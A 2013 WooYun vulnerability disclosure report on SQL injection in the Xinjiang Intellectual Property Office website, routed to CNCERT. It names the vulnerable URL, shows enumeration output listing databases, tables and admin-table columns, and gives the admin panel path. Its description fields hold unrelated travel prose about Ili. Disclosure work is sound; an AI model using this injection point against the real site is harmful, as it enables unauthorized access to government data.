当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2013-043933

漏洞标题:新疆维吾尔自治区知识产权局sql注射可进后台

相关厂商:新疆维吾尔自治区知识产权局

漏洞作者: 雅柏菲卡

提交时间:2013-11-28 16:53

修复时间:2014-01-12 16:53

公开时间:2014-01-12 16:53

漏洞类型:SQL注射漏洞

危害等级:中

自评Rank:8

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2013-11-28: 细节已通知厂商并且等待厂商处理中
2013-12-01: 厂商已经确认,细节仅向厂商公开
2013-12-11: 细节向核心白帽子及相关领域专家公开
2013-12-21: 细节向普通白帽子公开
2013-12-31: 细节向实习白帽子公开
2014-01-12: 细节向公众公开

简要描述:

牧歌滑过高高的斜坡 
滑过胡杨林  
夹杂着果子的芬芳  
在辽阔的草原上回荡  
我们的心 装满了美丽的喜悦

详细说明:

位于西北边陲的伊犁,素有“塞外江南”之美称。伊犁是中亚腹地一个温馨的绿岛,是遥远西陲一方天赐的宝地,是千里塞外一片杏花开放的江南……临近异国的伊犁,弥漫着浓浓的异域风情。伊犁地区为天山各支脉所环绕分隔,其独特的地理环境,派生出一系列各具特色、奇异的自然景观。伊犁美,美在气候宜人,风景秀丽,资源雄厚,物产富娆;伊犁美,美在民族风情特色浓、色彩斑斓的民族情;伊犁美,美还美在历史久远源头长,观光旅游景点多......
香飘十里的果子沟,山路十八盘,层林迭嶂,瀑布泉涌,山花烂漫,果木成林,被称为“奇绝仙境”,一日可见四季景观,步步可见不同景色;碧波荡漾的赛里木湖,蓝蓝的湖水,蓝蓝的天,雪山环抱,白云千载空悠悠。湖岸每年定居着一些水禽飞鸟,有“世外灵壤”之称;一望无际的那拉提草原,河谷平展,森林繁茂,自古以来就是注明的牧场;悠悠西去的伊犁河,象一个温柔的母亲,无言地滋养着这片美丽的土地。
河岸是一片青青的白杨林,展现着《草原之夜》的迷人意境。少有这样鲜亮的蓝天碧野; 少见高山下的万顷良田!在这里,雪山长河落日映衬小桥流水人家;在这里,牛羊毡房牧场与现代城镇迭合在同一个画面……伊犁之美,实在是美不胜收。除了领略自然风光,到了伊犁,你还可以去看看维吾尔农家用蓝马车迎新娘,尝尝香喷喷的手抓饭和鲜嫩的烤羊肉,骑上俊马在草原上奔驰,尽情欣赏牧场风光。还可以到哈萨克毡房去做客,听热情的哈萨克老人讲那些年代久远的故事……

漏洞证明:

http://www.xjipo.gov.cn/Counter/Counter.aspx?CounterID=1 注入点
available databases [9]:
[*] dcbase
[*] master
[*] model
[*] msdb
[*] Northwind
[*] pubs
[*] tempdb
[*] xjwwezscqj
[*] xjzscqj
Database: xjzscqj
[102 tables]
+------------------------------+
| dbo.LabelTree |
| dbo.PE_Special |
| dbo.TM_ActureStep |
| dbo.TM_AdZone |
| dbo.TM_Admin |
| dbo.TM_Advertisement |
| dbo.TM_Analysis |
| dbo.TM_Announce |
| dbo.TM_AreaCollection |
| dbo.TM_Article |
| dbo.TM_Author |
| dbo.TM_Catalog |
| dbo.TM_Channel |
| dbo.TM_City |
| dbo.TM_Class |
| dbo.TM_Comment |
| dbo.TM_Company |
| dbo.TM_ComplainItem |
| dbo.TM_Config |
| dbo.TM_CopyFrom |
| dbo.TM_Counter |
| dbo.TM_Country |
| dbo.TM_Department |
| dbo.TM_Dictionary |
| dbo.TM_Field |
| dbo.TM_Filters |
| dbo.TM_FlowDefine |
| dbo.TM_FlowStep |
| dbo.TM_FlowType |
| dbo.TM_Friend |
| dbo.TM_FriendSite |
| dbo.TM_FsKind |
| dbo.TM_Funcs |
| dbo.TM_GovAreaCode |
| dbo.TM_GovInfo |
| dbo.TM_GovService |
| dbo.TM_GuestBook |
| dbo.TM_GuestKind |
| dbo.TM_HistrolyNews |
| dbo.TM_InfoS |
| dbo.TM_InfoSend |
| dbo.TM_Interview |
| dbo.TM_InterviewQuestionType |
| dbo.TM_InterviewQuestions |
| dbo.TM_InterviewUser |
| dbo.TM_InvoiceItem |
| dbo.TM_Item |
| dbo.TM_ItemLog |
| dbo.TM_JobCategory |
| dbo.TM_JsFile |
| dbo.TM_KeyLink |
| dbo.TM_KeywordType |
| dbo.TM_Keywords |
| dbo.TM_Label |
| dbo.TM_LabelElement |
| dbo.TM_LabelInfo |
| dbo.TM_Log |
| dbo.TM_ManageTables |
| dbo.TM_Message |
| dbo.TM_NetGuard |
| dbo.TM_Photo |
| dbo.TM_PigeonholeActureStep |
| dbo.TM_PigeonholeFields |
| dbo.TM_PigeonholeWorkFlow |
| dbo.TM_SelfLabel |
| dbo.TM_Skin |
| dbo.TM_Special |
| dbo.TM_Survey |
| dbo.TM_SurveyOptions |
| dbo.TM_SurveyTopic |
| dbo.TM_TablesContent |
| dbo.TM_TablesFields |
| dbo.TM_Template |
| dbo.TM_TemplateInfo |
| dbo.TM_TemplateProject |
| dbo.TM_TemplateSort |
| dbo.TM_TitlePic |
| dbo.TM_UsedDetail |
| dbo.TM_User |
| dbo.TM_User111 |
| dbo.TM_UserGroup |
| dbo.TM_Vote |
| dbo.TM_WebSite |
| dbo.TM_WorkFlow |
| dbo.TM_WorkFlowState |
| dbo.TM_WorkPlace |
| dbo.V_CommentTitle |
| dbo.V_CommnetPassed |
| dbo.ViewTM_FinishWork |
| dbo.ViewTM_User |
| dbo.ViewTM_Work |
| dbo.dtproperties |
| dbo.sysconstraints |
| dbo.syssegments |
| dbo.tabArticleClass |
| dbo.test11 |
| dbo.test_Class |
| dbo.vieArticle |
| dbo.vieGovInfo |
| dbo.vieInfoSend |
| dbo.viewTM_gov |
| zym.DIY_TEMPCOMMAND_TABLE |
+------------------------------+
Database: xjzscqj
Table: dbo.TM_Admin
[41 columns]
+------------------------+------+
| Column | Type |
+------------------------+------+
| AdminName | bit |
| AdminPurview_Article | bit |
| AdminPurview_economy | bit |
| AdminPurview_GuestBook | bit |
| AdminPurview_House | bit |
| AdminPurview_Job | bit |
| AdminPurview_Others | bit |
| AdminPurview_Photo | bit |
| AdminPurview_Shop | bit |
| AdminPurview_Soft | bit |
| AdminPurview_Supply | bit |
| AreaCode | bit |
| AreaID | bit |
| AreaName | bit |
| arrClass_Check | bit |
| arrClass_GuestBook | bit |
| arrClass_House | bit |
| arrClass_Input | bit |
| arrClass_Manage | bit |
| arrClass_View | bit |
| Count_Add | bit |
| Count_Check | bit |
| Count_Reject | bit |
| DepartCode | bit |
| DepartID | bit |
| DepartName | bit |
| EnableMultiLogin | bit |
| ID | int |
| LastLoginIP | int |
| LastLoginTime | int |
| LastLogoutTime | int |
| LinkEmail | int |
| LinkMobile | int |
| LinkTel | int |
| LoginTimes | int |
| Password | int |
| Purview | int |
| RndPassword | int |
| RoleName | int |
| UserName | int |
| WebSiteID | int |
+------------------------+------+

QQ截图20131124191123.jpg


http://www.xjipo.gov.cn/admin/ 后台地址

QQ截图20131124191239.jpg

修复方案:

版权声明:转载请注明来源 雅柏菲卡@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:13

确认时间:2013-12-01 22:38

厂商回复:

最新状态:

暂无